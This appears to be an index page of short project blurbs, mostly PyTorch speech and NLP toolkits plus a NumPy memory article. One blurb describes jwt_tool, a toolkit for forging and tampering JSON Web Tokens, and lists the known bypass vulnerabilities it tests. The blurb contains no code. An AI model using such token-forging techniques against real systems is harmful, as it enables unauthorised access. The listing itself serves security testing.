Sequence to Sequence Framework in PyTorch

nmtpytorch Sequence to Sequence Framework in PyTorch This project is not actively maintained so issues created are unlikely to be addressed in a timely way. If you are interested, there’s a recent fork of this repository called pysimt which includes Transformer-based architectures as well. nmtpytorch allows training of various end-to-end neural architectures includingbut not limited to neural machine translation, image captioning and automaticspeech recognition systems. The initial codebase was in Theano and wasinspired from the famous dl4mt-tutorialcodebase. nmtpytorch received valuable […]

Read more

An implementation of WaveNet with fast generation

pytorch-wavenet This is an implementation of the WaveNet architecture, as described in the original paper. pytorch-wavenet This is an implementation of the WaveNet architecture, as described in the original paper. Features Automatic creation of a dataset (training and validation/test set) from all sound files (.wav, .aiff, .mp3) in a directory Efficient multithreaded data loading Logging to TensorBoard (Training loss, validation loss, validation accuracy, parameter and gradient histograms, generated samples) Fast generation, as introduced here Requirements python 3 pytorch 0.3 numpy […]

Read more

Pytorch implementation of Tacotron

Tacotron-pytorch A pytorch implementation of Tacotron: A Fully End-to-End Text-To-Speech Synthesis Model. Data I used LJSpeech dataset which consists of pairs of text script and wav files. The complete dataset (13,100 pairs) can be downloaded here. I referred https://github.com/keithito/tacotron for the preprocessing code. File description hyperparams.py includes all hyper parameters that are needed. data.py loads training data and preprocess text to index and wav files to spectrogram. Preprocessing codes for text is in text/ directory. module.py contains all methods, including […]

Read more

A deep learning nlp library inspired by the fast.ai library

Quick NLP Quick NLP is a deep learning nlp library inspired by the fast.ai library It follows the same api as fastai and extends it allowing for quick and easy running of nlp models Features Python 3.6 code Tight-knit integration with Fast.ai library: Fast.ai style DataLoader objects for sentence to sentence algorithms Fast.ai style DataLoader objects for dialogue algorithms Fast.ai style DataModel objects for training nlp models Can run a seq2seq model with a few lines of code similar to […]

Read more

Neural speaker diarization with pyannote-audio

Neural speaker diarization with pyannote-audio Neural building blocks for speaker diarization: speech activity detection, speaker change detection, overlapped speech detection, speaker embedding pyannote.audio is an open-source toolkit written in Python for speaker diarization. Based on PyTorch machine learning framework, it provides a set of trainable end-to-end neural building blocks that can be combined and jointly optimized to build speaker diarization pipelines: pyannote.audio also comes with pretrained models covering a wide range of domains for voice activity detection, speaker change detection, […]

Read more

Learning General Purpose Distributed Sentence Representations via Large Scale Multi-task Learning

Learning General Purpose Distributed Sentence Representations via Large Scale Multi-task Learning Sandeep Subramanian, Adam Trischler, Yoshua Bengio & Christopher Pal ICLR 2018 About GenSen is a technique to learn general purpose, fixed-length representations of sentences via multi-task training. These representations are useful for transfer and low-resource learning. For details please refer to our ICLR paper. Code We provide a PyTorch implementation of our paper along with pre-trained models as well as code to evaluate these models on a variety of […]

Read more

ESPnet: end-to-end speech processing toolkit

ESPnet ESPnet is an end-to-end speech processing toolkit, mainly focuses on end-to-end speech recognition and end-to-end text-to-speech. ESPnet uses chainer and pytorch as a main deep learning engine, and also follows Kaldi style data processing, feature extraction/format, and recipes to provide a complete setup for speech recognition and other speech processing experiments. Key Features Kaldi style complete recipe Support numbers of ASR recipes (WSJ, Switchboard, CHiME-4/5, Librispeech, TED, CSJ, AMI, HKUST, Voxforge, REVERB, etc.) Support numbers of TTS recipes with […]

Read more

A toolkit for validating, forging, scanning and tampering JWTs

jwt_tool.py is a toolkit for validating, forging, scanning and tampering JWTs (JSON Web Tokens). Its functionality includes: Checking the validity of a token Testing for known exploits: (CVE-2015-2951) The alg=none signature-bypass vulnerability (CVE-2016-10555) The RS/HS256 public key mismatch vulnerability (CVE-2018-0114) Key injection vulnerability (CVE-2019-20933/CVE-2020-28637) Blank password vulnerability (CVE-2020-28042) Null signature vulnerability Scanning for misconfigurations or known weaknesses Fuzzing claim values to provoke unexpected behaviours Testing the validity of a secret/key file/Public Key/JWKS key Identifying weak keys via a High-speed Dictionary […]

Read more

Identifying The Language of A Document Using NLP!

This article was published as a part of the Data Science Blogathon Introduction The goal of this article is to identify the language from the written text. The text in documents is available in many languages and when we don’t know the language it becomes very difficult sometimes to tell this to google translator as well. For most translators, we have to tell both the input language and the desired language. If you had a text written in Spanish and you […]

Read more

NumPy views: saving memory, leaking memory, and subtle bugs

If you’re using Python’s NumPy library, it’s usually because you’re processing large arrays that use plenty of memory. To reduce your memory usage, chances are you want to minimize unnecessary copying, NumPy has a built-in feature that does this transparently, in many common cases: memory views. However, this feature can also cause higher memory usage by preventing arrays from being garbage collected. And in some cases it can cause bugs, with data being mutated in unexpected ways. To avoid these […]

Read more
1 529 530 531 532 533 927